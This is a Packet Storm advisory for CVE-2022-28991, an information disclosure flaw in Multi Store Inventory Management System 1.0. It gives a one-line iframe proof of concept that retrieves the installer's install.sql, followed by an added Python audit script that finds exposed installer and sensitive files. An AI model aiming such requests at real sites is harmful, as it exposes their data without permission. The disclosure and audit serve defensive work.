CVE-2022-28991: Multi Store Inventory Management System 1.0 Information Disclosure ≈ Packet Storm
Multi Store Inventory Management System v1.0 was discovered to contain an information disclosure vulnerability which allows attackers to access sensitive files.
# Exploit Title: Multi Store Inventory Management System - Information Disclosure
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz

# Description :

The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information.

################################################

PoC Html :

<html>
<head>
<title>Multi Store Inventory Management System - Information Disclosure</title>
</head>
<body>
<iframe src="http://127.0.0.1/multistore_demo/install/sql/install.sql"></iframe>
</body>
</html>
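
Added example, not part of the original advisory or the vendor's code: a defender-side audit of a document root for the two conditions described above, browsable directories and leftover installer SQL such as install/sql/install.sql. The extension list, the .htaccess-only check for "Options -Indexes" and the temporary directory tree are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

SENSITIVE_EXT = {".sql", ".bak", ".old", ".zip"}  # assumption: adjust per site
NO_INDEX = re.compile(r"^\s*Options\b.*-Indexes\b", re.I | re.M)

def listing_disabled(directory, docroot):
    """True if .htaccess here or in a parent (up to docroot) sets Options -Indexes."""
    directory, docroot = os.path.abspath(directory), os.path.abspath(docroot)
    while True:
        ht = os.path.join(directory, ".htaccess")
        if os.path.isfile(ht):
            with open(ht, encoding="utf-8", errors="replace") as fh:
                if NO_INDEX.search(fh.read()):
                    return True
        parent = os.path.dirname(directory)
        if directory == docroot or parent == directory:
            return False
        directory = parent

def audit(docroot):
    """Return sorted (relative_path, reason) findings for everything under docroot."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        rel_dir = os.path.relpath(dirpath, docroot)
        if os.path.basename(dirpath).lower() == "install":
            findings.append((rel_dir, "installer directory left in docroot"))
        if not listing_disabled(dirpath, docroot):
            findings.append((rel_dir, "directory listing not disabled by .htaccess"))
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SENSITIVE_EXT:
                findings.append((os.path.join(rel_dir, name), "sensitive file web-reachable"))
    return sorted(findings)

def demo():
    """Audit a constructed tree before and after adding 'Options -Indexes'."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "install", "sql"))
        with open(os.path.join(root, "install", "sql", "install.sql"), "w") as fh:
            fh.write("-- constructed sample schema\n")
        before = audit(root)
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write("Options -Indexes\n")
        after = audit(root)
    return before, after

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The second result still reports install.sql: turning off directory listing hides the file from browsing but does not stop a direct request for it, so the installer directory has to be removed or denied as well.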